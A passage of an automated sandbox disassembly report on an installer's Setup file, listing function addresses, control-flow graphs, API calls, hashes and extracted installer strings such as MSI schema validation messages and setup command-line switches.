                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$Exception@8Throw
                                                                                                                                                                    • String ID: <$ActionTable$ApplicableIf$Compressed$Compressed items need to have URL and CompressedDownloadSize authored.$CustomErrorHandling$IsPresent$MSIOptions$MSIRepairOptions$MSIUninstallOptions$ParameterInfo.xml$ProductCode$RepairOverride$UninstallOverride$schema validation failure: MSI, AgileMSI and AgileMSP do not support RepairOverride or UninstallOverride child elements!$schema validation failure: Product Code cannot be emoty.$schema validation failure: wrong number of MSI child nodes!
                                                                                                                                                                    • API String ID: 2489616738-1903366528
                                                                                                                                                                    • Opcode ID: f87e1dc73f48f1c34f6a8dca27f7fe3f63541bbfc58bb98e4b636ab5a38ec437
                                                                                                                                                                    • Instruction ID: 187d32d8f8fa3392501f59bb3b5f72a39c4ae4e1452828f898575e5dc51623c2
                                                                                                                                                                    • Opcode Fuzzy Hash: f87e1dc73f48f1c34f6a8dca27f7fe3f63541bbfc58bb98e4b636ab5a38ec437
                                                                                                                                                                    • Instruction Fuzzy Hash: 91422C75A04249EFDB04DFA8C944A9EBBB8BF09314F048569F825EB781C734EA15CB71
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D92582 Relevance: 32.0, APIs: 2, Strings: 16, Instructions: 464COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1454 69d92582-69d925bb call 69dd6e1a call 69d78996 call 69da85bc 1461 69d925bd-69d925d1 call 69dcc0aa 1454->1461 1462 69d92635-69d92645 call 69da85bc 1454->1462 1467 69d9260f 1461->1467 1468 69d925d3-69d925fd call 69da833e 1461->1468 1469 69d92688-69d92698 call 69da85bc 1462->1469 1470 69d92647-69d9265b call 69dcc0aa 1462->1470 1471 69d92611-69d9261f 1467->1471 1480 69d925ff-69d92601 1468->1480 1481 69d92605-69d92608 call 69d8a82c 1468->1481 1485 69d926da-69d926ea call 69da85bc 1469->1485 1486 69d9269a-69d926ae call 69dcc0aa 1469->1486 1482 69d928bd 1470->1482 1483 69d92661-69d92671 1470->1483 1475 69d92625-69d92630 call 69dc8f0e 1471->1475 1476 69d928c6-69d928f1 call 69da833e call 69dd68b5 1471->1476 1475->1476 1506 69d92938-69d9297b call 69da8cd5 call 69da8c7a call 69da8c24 1476->1506 1507 69d928f3-69d92936 call 69d86cb7 call 69dc8eab call 69da84b9 call 69dc8f0e * 2 1476->1507 1480->1481 1497 69d9260d 1481->1497 1494 69d928bf-69d928c3 1482->1494 1488 69d92679-69d92683 call 69d8f05d 1483->1488 1489 69d92673-69d92675 1483->1489 1503 69d9272b-69d9273b call 69da85bc 1485->1503 1504 69d926ec-69d92700 call 69dcc0aa 1485->1504 1486->1482 1505 69d926b4-69d926c5 1486->1505 1488->1494 1489->1488 1494->1476 1497->1471 1518 69d9277d-69d9278d call 69da85bc 1503->1518 1519 69d9273d-69d92751 call 69dcc0aa 1503->1519 1504->1482 1521 69d92706-69d92716 1504->1521 1509 69d926cd-69d926d5 call 69d8b69b 1505->1509 1510 69d926c7-69d926c9 1505->1510 1551 69d92980-69d929c0 call 69dc8f0e * 5 1506->1551 1507->1506 1509->1494 1510->1509 1538 69d9278f-69d927a3 call 69dcc0aa 1518->1538 1539 69d927d0-69d927e0 call 69da85bc 1518->1539 1519->1482 1535 69d92757-69d92768 1519->1535 1525 69d92718-69d9271a 1521->1525 1526 69d9271e-69d92721 call 69d8d8a6 1521->1526 1525->1526 1537 69d92726 1526->1537 1541 69d9276a-69d9276c 1535->1541 1542 69d92770-69d92778 call 69d8c922 1535->1542 1537->1494 1538->1482 1550 69d927a9-69d927b9 1538->1550 1554 69d92823-69d92833 call 69da85bc 1539->1554 1555 69d927e2-69d927f6 call 69dcc0aa 1539->1555 1541->1542 1542->1494 1556 69d927bb-69d927bd 1550->1556 1557 69d927c1-69d927c6 call 69d8e30e 1550->1557 1604 69d929c8-69d929d0 call 69dd6f06 1551->1604 1605 69d929c2-69d929c4 1551->1605 1568 69d9286e-69d9287e call 69da85bc 1554->1568 1569 69d92835-69d92849 call 69dcc0aa 1554->1569 1555->1482 1571 69d927fc-69d9280c 1555->1571 1556->1557 1567 69d927cb 1557->1567 1567->1494 1582 69d929d3-69d92ad5 call 69da8cd5 call 69da8c7a call 69dc8f0e * 2 call 69da833e call 69da8cd5 call 69d7838a call 69dc8f0e * 2 call 69d78415 call 69dc8f0e call 69d7a378 call 69dd14aa call 69d8632c 1568->1582 1583 69d92884-69d92898 call 69dcc0aa 1568->1583 1569->1482 1584 69d9284b-69d9285c 1569->1584 1574 69d9280e-69d92810 1571->1574 1575 69d92814-69d92819 call 69d8facf 1571->1575 1574->1575 1581 69d9281e 1575->1581 1581->1494 1635 69d92ade-69d92ae2 1582->1635 1636 69d92ad7-69d92add call 69dcb081 1582->1636 1583->1482 1595 69d9289a-69d928ab 1583->1595 1588 69d9285e-69d92860 1584->1588 1589 69d92864-69d9286c call 69d902c6 1584->1589 1588->1589 1589->1494 1599 69d928ad-69d928af 1595->1599 1600 69d928b3-69d928b6 call 69d91287 1595->1600 1599->1600 1607 69d928bb 1600->1607 1605->1604 1607->1494 1636->1635
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D92589
                                                                                                                                                                      • Part of subcall function 69DCC0AA: _malloc.LIBCMT ref: 69DCC0C4
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 69D92AB0
                                                                                                                                                                      • Part of subcall function 69DCC0AA: std::exception::exception.LIBCMT ref: 69DCC0F9
                                                                                                                                                                      • Part of subcall function 69DCC0AA: std::exception::exception.LIBCMT ref: 69DCC113
                                                                                                                                                                      • Part of subcall function 69DCC0AA: __CxxThrowException@8.LIBCMT ref: 69DCC124
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Exception@8H_prolog3Throwstd::exception::exception$_malloc
                                                                                                                                                                    • String ID: ", local path $". Valid types are MSI, MSP, Exe, Patches, ServiceControl and File. Theses are case sensitive.$(not applicable)$Adding Item type "$AgileMSI$CleanupBlock$Exe$File$MSI$MSP$ParameterInfo.xml$Patches$RelatedProducts$ServiceControl$Unknown Item type "$schema validation failure: unknown Item type -
                                                                                                                                                                    • API String ID: 3439882596-1328758535
                                                                                                                                                                    • Opcode ID: bc2f7695ab9aac44441fe5acc77e0197c8467f99a027359b4d9bde2c009e3e26
                                                                                                                                                                    • Instruction ID: a9a59c67e434244cc56898e187171b514420a9fa154c0b68ae29caf070675290
                                                                                                                                                                    • Opcode Fuzzy Hash: bc2f7695ab9aac44441fe5acc77e0197c8467f99a027359b4d9bde2c009e3e26
                                                                                                                                                                    • Instruction Fuzzy Hash: AB026B75904248EFDF00EBA8CD44AED7BB8BF19318F108179E515E7A81DB349A458BB2
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 698DBE03 Relevance: 31.7, APIs: 1, Strings: 17, Instructions: 220COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 698DBE0A
                                                                                                                                                                      • Part of subcall function 698EE8E8: __EH_prolog3.LIBCMT ref: 698EE8EF
                                                                                                                                                                      • Part of subcall function 698EF35E: __EH_prolog3.LIBCMT ref: 698EF365
                                                                                                                                                                      • Part of subcall function 698EF35E: __recalloc.LIBCMT ref: 698EF3A7
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$__recalloc
                                                                                                                                                                    • String ID: CEIPconsent$NoSetupVersionCheck$chainingpackage$createlayout$lcid$log$msioptions$norestart$parameterfolder$passive$pipe$promptrestart$repair$serialdownload$showfinalerror$uninstall$uninstallpatch
                                                                                                                                                                    • API String ID: 1900422986-634121796
                                                                                                                                                                    • Opcode ID: eccd54274b3a41c96392ef46771ed883ebf02105b6715a8f1c25fd55c71f776a
                                                                                                                                                                    • Instruction ID: f4e822a694f000e7035c8106441754590dbd9031f7b593e0a74591fcaaee3d81
                                                                                                                                                                    • Opcode Fuzzy Hash: eccd54274b3a41c96392ef46771ed883ebf02105b6715a8f1c25fd55c71f776a
                                                                                                                                                                    • Instruction Fuzzy Hash: 70A12AB580026D9EDF01D7ECC8807EDB7B4AF2631CF589D8DE024A3292D7759A499732
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D73E77 Relevance: 31.7, APIs: 1, Strings: 17, Instructions: 219COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D73E7E
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                      • Part of subcall function 69DA9067: __EH_prolog3.LIBCMT ref: 69DA906E
                                                                                                                                                                      • Part of subcall function 69DA9067: __recalloc.LIBCMT ref: 69DA90B0
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$__recalloc
                                                                                                                                                                    • String ID: CEIPconsent$NoSetupVersionCheck$chainingpackage$createlayout$lcid$log$msioptions$norestart$parameterfolder$passive$pipe$promptrestart$repair$serialdownload$showfinalerror$uninstall$uninstallpatch
                                                                                                                                                                    • API String ID: 1900422986-634121796
                                                                                                                                                                    • Opcode ID: 10e5c15fe0d1945d16d6c8f61a1301717189359bc201cf1338beb0aa104e737e
                                                                                                                                                                    • Instruction ID: 34e285db2b89c4f4219bcf6b0adfe3bb504e936d9e55ef2790fda202b047460b
                                                                                                                                                                    • Opcode Fuzzy Hash: 10e5c15fe0d1945d16d6c8f61a1301717189359bc201cf1338beb0aa104e737e
                                                                                                                                                                    • Instruction Fuzzy Hash: A391F9394042CCEADB00DFB8C544BCCBBA9AF1136CF54D164E8649BA81D7B5D7289736
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D8148D Relevance: 30.3, APIs: 3, Strings: 14, Instructions: 510COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1872 69d8148d-69d81502 call 69d7ac58 call 69da85bc 1878 69d81508-69d8151d call 69dcc0aa 1872->1878 1879 69d8158e-69d815a1 call 69da85bc 1872->1879 1884 69d8151f-69d8153b call 69da833e call 69d80e96 1878->1884 1885 69d81554 1878->1885 1886 69d8160b-69d8161c call 69da85bc 1879->1886 1887 69d815a3-69d815b8 call 69dcc0aa 1879->1887 1908 69d81540-69d81552 call 69dc8f0e 1884->1908 1888 69d81556-69d81561 1885->1888 1901 69d8161e-69d81631 call 69dcc0aa 1886->1901 1902 69d81661-69d81674 call 69da85bc 1886->1902 1899 69d815ba-69d815d6 call 69da833e call 69d80e96 1887->1899 1900 69d815ef 1887->1900 1892 69d81569 1888->1892 1893 69d81563-69d81565 1888->1893 1897 69d8156b-69d8158b call 69dc8f0e 1892->1897 1893->1892 1922 69d815db-69d815ed call 69dc8f0e 1899->1922 1905 69d815f1-69d815fc 1900->1905 1916 69d81643 1901->1916 1917 69d81633-69d8163a call 69d811f6 1901->1917 1920 69d816c9-69d816dc call 69da85bc 1902->1920 1921 69d81676-69d8168b call 69dcc0aa 1902->1921 1912 69d815fe-69d81600 1905->1912 1913 69d81604-69d81606 1905->1913 1908->1888 1912->1913 1913->1897 1924 69d81645-69d81650 1916->1924 1927 69d8163f-69d81641 1917->1927 1933 69d816de-69d816f3 call 69dcc0aa 1920->1933 1934 69d81731-69d81744 call 69da85bc 1920->1934 1921->1900 1935 69d81691-69d816c4 call 69da833e call 69d800a7 call 69dc8f0e 1921->1935 1922->1905 1924->1897 1929 69d81656-69d8165c 1924->1929 1927->1924 1929->1897 1933->1900 1946 69d816f9-69d8172c call 69da833e call 69d800a7 call 69dc8f0e 1933->1946 1944 69d81799-69d817ac call 69da85bc 1934->1944 1945 69d81746-69d8175b call 69dcc0aa 1934->1945 1935->1905 1955 69d817ae-69d817c3 call 69dcc0aa 1944->1955 1956 69d81801-69d81814 call 69da85bc 1944->1956 1945->1900 1958 69d81761-69d81794 call 69da833e call 69d800a7 call 69dc8f0e 1945->1958 1946->1905 1955->1900 1971 69d817c9-69d817fc call 69da833e call 69d800a7 call 69dc8f0e 1955->1971 1968 69d81869-69d8187a call 69da85bc 1956->1968 1969 69d81816-69d8182b call 69dcc0aa 1956->1969 1958->1905 1983 69d8187c-69d8187e call 69dcc0aa 1968->1983 1984 69d818a6-69d818b7 call 69da85bc 1968->1984 1969->1900 1981 69d81831-69d81864 call 69da833e call 69d800a7 call 69dc8f0e 1969->1981 1971->1905 1981->1905 1993 69d81883-69d8188f 1983->1993 1995 69d818b9-69d818c3 call 69dcc0aa 1984->1995 1996 69d818d7-69d818e8 call 69da85bc 1984->1996 1993->1916 1994 69d81895-69d818a1 call 69d80baa 1993->1994 1994->1984 1995->1916 2010 69d818c9 1995->2010 2007 69d818ea-69d818f4 call 69dcc0aa 1996->2007 2008 69d81902-69d819d7 call 69da833e call 69da8cd5 call 69d7838a call 69dc8f0e * 2 call 69d78415 call 69dc8f0e call 69d7a378 call 69dd14aa call 69dd6e1a call 69d78b9f call 69d8148d 1996->2008 2007->1916 2016 69d818fa-69d81900 2007->2016 2040 69d819dc-69d819e8 2008->2040 2013 69d818cf 2010->2013 2013->1996 2016->2013 2041 69d819ea-69d819ec 2040->2041 2042 69d819f0-69d81a19 call 69dc8eab 2040->2042 2041->2042 2045 69d81a1b-69d81a1d 2042->2045 2046 69d81a21-69d81a29 call 69d7922c 2042->2046 2045->2046 2049 69d81a2f-69d81ade call 69da833e call 69da8cd5 call 69da8c7a call 69d7838a call 69dc8f0e * 3 call 69d78415 call 69dc8f0e call 69d7a378 call 69dd14aa 2046->2049 2050 69d81ae3-69d81aea call 69dd6f06 2046->2050 2049->2050
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$Exception@8FreeStringThrow_malloc
                                                                                                                                                                    • String ID: can only have one logical or arithmietic expression for a child node$AlwaysTrue$And$Equals$Exists$GreaterThan$GreaterThanOrEqualTo$LessThan$LessThanOrEqualTo$NeverTrue$Not$ParameterInfo.xml$schema validation failure: $schema validation failure: unknown Expression:
                                                                                                                                                                    • API String ID: 1924927865-100526994
                                                                                                                                                                    • Opcode ID: d206ee95d3655047bbca23b62318d71d8bc2d4d33e4c176972ca019da53ffd01
                                                                                                                                                                    • Instruction ID: 3670cca19e22b77340129c00bb83a383e697308bc03857ddbfbe785ca3cd2335
                                                                                                                                                                    • Opcode Fuzzy Hash: d206ee95d3655047bbca23b62318d71d8bc2d4d33e4c176972ca019da53ffd01
                                                                                                                                                                    • Instruction Fuzzy Hash: 54028D75108381DBD700CFA8C980B9EBBECAF95358F108939F595D7A92DB70D9088B72
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D8FACF Relevance: 30.2, APIs: 2, Strings: 15, Instructions: 475COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 2075 69d8facf-69d8fb0f call 69dd6e1a call 69da833e 2080 69d8fb11-69d8fb13 2075->2080 2081 69d8fb17-69d8fb68 call 69d7a1ff call 69dc8f0e call 69da833e 2075->2081 2080->2081 2088 69d8fb6a-69d8fb6c 2081->2088 2089 69d8fb70-69d8fb92 call 69d78d44 call 69d81c2e 2081->2089 2088->2089 2094 69d8fb9a-69d8fbd0 call 69dc8f0e call 69da833e 2089->2094 2095 69d8fb94-69d8fb96 2089->2095 2100 69d8fbd8-69d8fbfa call 69d78d44 call 69d81d3d 2094->2100 2101 69d8fbd2-69d8fbd4 2094->2101 2095->2094 2106 69d8fbfc-69d8fbfe 2100->2106 2107 69d8fc02-69d8fc38 call 69dc8f0e call 69da833e 2100->2107 2101->2100 2106->2107 2112 69d8fc3a-69d8fc3c 2107->2112 2113 69d8fc40-69d8fc63 call 69d78d44 call 69d8784c 2107->2113 2112->2113 2118 69d8fc6b-69d8fca0 call 69dc8f0e call 69da833e 2113->2118 2119 69d8fc65-69d8fc67 2113->2119 2124 69d8fca8-69d8fcc8 call 69d79411 call 69d83ba9 2118->2124 2125 69d8fca2-69d8fca4 2118->2125 2119->2118 2130 69d8fcca-69d8fccc 2124->2130 2131 69d8fcd0-69d8fcf0 call 69dc8f0e 2124->2131 2125->2124 2130->2131 2134 69d8fcf8-69d8fd7c call 69d86d1f call 69d897ce call 69da833e 2131->2134 2135 69d8fcf2-69d8fcf4 2131->2135 2142 69d8fd7e-69d8fd80 2134->2142 2143 69d8fd84-69d8fdb2 call 69d795c1 call 69dc8f0e 2134->2143 2135->2134 2142->2143 2148 69d8fdba-69d8fdf4 call 69d8f8cd call 69da833e 2143->2148 2149 69d8fdb4-69d8fdb6 2143->2149 2154 69d8fdfc-69d8fe03 call 69d790aa 2148->2154 2155 69d8fdf6-69d8fdf8 2148->2155 2149->2148 2158 69d8fe4a 2154->2158 2159 69d8fe05-69d8fe35 call 69da833e 2154->2159 2155->2154 2160 69d8fe4c-69d8fe50 2158->2160 2168 69d8fe3d call 69d790aa 2159->2168 2169 69d8fe37-69d8fe39 2159->2169 2162 69d8fe61-69d8fe6b 2160->2162 2163 69d8fe52-69d8fe5c call 69dc8f0e 2160->2163 2166 69d8fe7c-69d8fe7e 2162->2166 2167 69d8fe6d-69d8fe77 call 69dc8f0e 2162->2167 2163->2162 2172 69d8fe80-69d8fee2 call 69da833e * 2 call 69d7838a call 69dc8f0e * 2 call 69d7a378 call 69dd14aa 2166->2172 2173 69d8fee7-69d8ff11 call 69da833e 2166->2173 2167->2166 2174 69d8fe42-69d8fe44 2168->2174 2169->2168 2172->2173 2180 69d8ff19-69d8ff20 call 69d7917e 2173->2180 2181 69d8ff13-69d8ff15 2173->2181 2174->2158 2177 69d8fe46-69d8fe48 2174->2177 2177->2160 2187 69d8ffa6 2180->2187 2188 69d8ff26-69d8ff53 call 69da833e 2180->2188 2181->2180 2192 69d8ffa8-69d8ffac 2187->2192 2197 69d8ff5b-69d8ff62 call 69d7917e 2188->2197 2198 69d8ff55-69d8ff57 2188->2198 2195 69d8ffbd-69d8ffc1 2192->2195 2196 69d8ffae-69d8ffb8 call 69dc8f0e 2192->2196 2201 69d8ffd2-69d8ffd9 2195->2201 2202 69d8ffc3-69d8ffcd call 69dc8f0e 2195->2202 2196->2195 2197->2187 2214 69d8ff64-69d8ff91 call 69da833e 2197->2214 2198->2197 2206 69d8ffdb-69d8ffe1 call 69dc8f0e 2201->2206 2207 69d8ffe6-69d8ffe8 2201->2207 2202->2201 2206->2207 2211 69d8ffea-69d9004b call 69da833e * 2 call 69d7838a call 69dc8f0e * 2 call 69d7a378 2207->2211 2212 69d90050-69d90059 2207->2212 2215 69d9005b-69d9005d 2212->2215 2216 69d90061-69d90068 call 69dd6f06 2212->2216 2226 69d8ff99-69d8ffa0 call 69d7917e 2214->2226 2227 69d8ff93-69d8ff95 2214->2227 2215->2216 2226->2187 2232 69d8ffa2-69d8ffa4 2226->2232 2227->2226 2232->2192
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D8FAD6
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3
                                                                                                                                                                    • String ID: +$ActionTable$ApplicableIf$Compressed$CompressedDownloadSize$CompressedHashValue$CustomErrorHandling$EstimatedInstallTime$IsPresent$Name$ParameterInfo.xml$RepairOverride$UninstallOverride$schema validation failure: ServiceControl does not support Compressed attributes!$schema validation failure: ServiceControl does not support RepairOverride or UninstallOverride child elements!
                                                                                                                                                                    • API String ID: 431132790-3507379325
                                                                                                                                                                    • Opcode ID: 4a23a97959a2f40c8e5009fc258e6b0bb5ff0322a8831a07931afa7e8959a18c
                                                                                                                                                                    • Instruction ID: 91bbbd3e238be2cc5c0d8357a05111da21bac3ff524d64b4fd80d8ac855fca23
                                                                                                                                                                    • Opcode Fuzzy Hash: 4a23a97959a2f40c8e5009fc258e6b0bb5ff0322a8831a07931afa7e8959a18c
                                                                                                                                                                    • Instruction Fuzzy Hash: FB122EB1904249EFDF04DFA8C944AEEBBB8BF09314F148169F825EB691D734DA05CB61
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 698E6199 Relevance: 30.0, APIs: 11, Strings: 6, Instructions: 265COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 698E61A0
                                                                                                                                                                      • Part of subcall function 698EE8E8: __EH_prolog3.LIBCMT ref: 698EE8EF
                                                                                                                                                                      • Part of subcall function 698E1E75: __EH_prolog3.LIBCMT ref: 698E1E7C
                                                                                                                                                                      • Part of subcall function 698E1E75: GetThreadLocale.KERNEL32(?,00000004,698E6734,0000004C,0000004C,698E7142,?,00000000), ref: 698E1E8E
                                                                                                                                                                    • PathIsRelativeW.SHLWAPI(?,?,?,0000003C,698F7332,?,?,?,?,?,?,?,00000000,?,?,?), ref: 698E61E9
                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?), ref: 698E61F6
                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?,?), ref: 698E622B
                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?), ref: 698E6230
                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 698E6299
                                                                                                                                                                    • CoUninitialize.OLE32(?,?), ref: 698E6340
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 698E63B7
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 698E63C9
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3Path$ExistsFile$Exception@8InitializeLocaleRelativeThreadThrowUninitialize
                                                                                                                                                                    • String ID: ' was not found in UiInfo.xml$String for StringID '$Strings$Strings.xml$Successfuly found file %s $UIInfo.xml
                                                                                                                                                                    • API String ID: 1923347782-1246989722
                                                                                                                                                                    • Opcode ID: c74a911b0cc0674d1fb09a64eabe89a23c1cb74c59543d20bcc1799cc5551fc2
                                                                                                                                                                    • Instruction ID: 3fa750959913540cdbb1a256d81912dd30bd365fa04aa0e5c71d6034173f06a1
                                                                                                                                                                    • Opcode Fuzzy Hash: c74a911b0cc0674d1fb09a64eabe89a23c1cb74c59543d20bcc1799cc5551fc2
                                                                                                                                                                    • Instruction Fuzzy Hash: F3A1AC75900149EFDF00CFB8C944BAEBBB8AF15318F14895DE524EB291DB31DA0ACB61
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DB0C91 Relevance: 30.0, APIs: 9, Strings: 8, Instructions: 247COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
